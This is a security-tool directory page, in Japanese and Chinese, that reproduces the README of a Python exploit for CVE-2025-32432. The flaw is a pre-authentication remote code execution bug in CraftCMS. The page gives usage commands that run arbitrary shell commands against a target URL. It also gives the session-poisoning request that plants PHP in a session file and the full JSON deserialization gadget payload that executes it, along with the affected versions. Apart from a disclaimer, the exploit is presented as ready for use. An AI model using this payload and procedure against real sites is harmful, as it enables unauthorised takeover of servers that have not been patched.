Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32432-PoC — Pythonエクスプロイト for CVE-2025-32432、CraftCMSのasset-transformエンドポイントにおける事前認証RCE。逆シリアル化ガジェットを介して任意のシェルコマンドを実行するための2パケットチェーンを含む。 | Kitploit
ツール/GitHubGitHub/cty-research-1/cve-2025-32432-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

Pythonエクスプロイト for CVE-2025-32432、CraftCMSのasset-transformエンドポイントにおける事前認証RCE。逆シリアル化ガジェットを介して任意のシェルコマンドを実行するための2パケットチェーンを含む。

リポジトリを見る
6421年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32432 エクスプロイトスクリプト (Python PoC)

CraftCMS 3.x / 4.x / 5.x 向け事前認証リモートコード実行
PoC メンテナー: C.T.Y. (研究目的のみ)
脆弱性発見: Nicolas Bourras – Orange Cyberdefense
追加の PoC 参考: SensePost の研究 & Chirag Artani の公開スクリプト


1. 概要

このリポジトリには、CraftCMS の asset-transform エンドポイントにおける事前認証 RCE である CVE-2025-32432 向けの 2 つの補完的な Python エクスプロイトが含まれています。

スクリプト目的
craftcms_rce_php_check.py安全性確認 — FnStream ガジェットを使用して 1 回のリクエストを送信し、任意の PHP が実行されるかどうかを確認します (phpinfo() 出力を表示)。低負荷での確認に最適。
craftcms_final_payload.pyフルエクスプロイト — 2 パケットチェーン: 最初に FnStream を介して PHP を埋め込み、次に FieldLayoutBehavior → PhpManager ガジェットを利用して 任意のシェルコマンド を実行。

この README 全体で説明しているのは 2 つ目のスクリプトです。 1 つ目のスクリプトは完全性と迅速な検証のために含まれています。Chirag Artani 提供 — クレジット を参照。 スクリプトファイル名は明確にするために変更されました。オリジナルの構造とアイデアは Chirag Artani によるものです。


2. 免責事項 🚨

教育および許可されたセキュリティテスト のみを目的としています。 これらのスクリプトを明示的な書面による許可なしにシステムに対して使用することは違法かつ非倫理的です。


3. 機能 (最終ペイロード)

  • ワンショット 2 パケット RCE
  • 自動 assetId ブルートフォース (404 → 302 ヒューリスティック)
  • カスタムシェルコマンド実行 (-c/--cmd)
  • HTTP または HTTPS で動作 (SSL 検証警告を抑制)
  • HTML レスポンスからのコマンド出力のクリーンな抽出

4. 要件

  • Python 3.8+
  • PyPI パッケージ (pip install -r requirements.txt でインストール):
    • requests
    • urllib3

5. インストール

# Clone the repo
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Install dependencies
pip install -r requirements.txt

6. 使用方法

6.1 簡単な PHP 実行確認

python3 craftcms_rce_php_check.py -u https://victim.com

phpinfo() の出力が表示された場合、ターゲットはほぼ確実にエクスプロイト可能です。

6.2 完全な 2 パケットエクスプロイト

python3 craftcms_final_payload.py -u https://victim.com -c "id"

オプション

オプションロングフォーム説明必須
-u--urlターゲットベース URL (末尾スラッシュなし)✅
-c--cmd実行するシェルコマンド✅
-a--asset既知の有効な assetId❌
-s--scan-maxブルートフォースの上限 (デフォルト: 300)❌

7. 脆弱性の仕組み (復習)

  • セッションポイズニング — GET /index.php?p=admin/dashboard&a=<?=...?> で任意の PHP を /tmp/sess_<ID> に書き込みます。
  • デシリアライゼーションガジェット — actions/assets/generate-transform への POST で FieldLayoutBehavior → PhpManager ガジェットを使用すると、CraftCMS がセッションファイルを require() し、コードを実行します。
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. テスト済みバージョン

  • CraftCMS < 3.9.15 (assetId ブルートフォースが必要)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. 参考文献と詳細情報

  • オリジナルアドバイザリ — Nicolas Bourras / Orange Cyberdefense
  • SensePost 詳細ブログ
  • Chirag Artani の PoC
  • CraftCMS セキュリティアドバイザリ
  • CVE-2025-32432 @ MITRE

10. クレジット

  • C.T.Y. — 完全な 2 パケット PoC とドキュメント
  • Chirag Artani — オリジナルの phpinfo 確認スクリプト (craftcms_rce_php_check.py) と初期研究アイデア スクリプトファイル名は明確にするために変更されました。オリジナルの構造とアイデアは Chirag Artani によるものです。
  • Nicolas Bourras / Orange Cyberdefense — 脆弱性の発見と責任ある開示
  • SensePost 研究チームからの追加の知見

11. ライセンス

責任についての注意: このコードの使用に起因する法的リスクや損害は、すべて利用者の責任となります。

MIT ライセンス — LICENSE を参照。


中文說明

1. 專案內容

檔案用途
craftcms_rce_php_check.pyPHP 執行可行性檢查:單一請求,使用 FnStream 觸發 phpinfo(),以低影響方式驗證目標是否易受攻擊。
此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
craftcms_final_payload.py兩包鏈完整利用:先以 FnStream 植入 PHP,再透過 PhpManager 執行任意指令。

2. 免責聲明

僅供教學與合法授權測試使用。未經授權操作即屬違法。


3. 快速檢查

python3 craftcms_rce_php_check.py -u https://目標站

4. 完整利用

python3 craftcms_final_payload.py -u https://目標站 -c "id"

參數與英文版相同。


5. 致謝

  • Chirag Artani — phpinfo 檢查腳本 此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
  • Nicolas Bourras / Orange Cyberdefense — 漏洞發現與技術靈感
  • SensePost — 技術靈感

6. 授權

使用本程式碼造成之任何法律風險與損失,由使用者自行承擔。

MIT License

ツールをダウンロード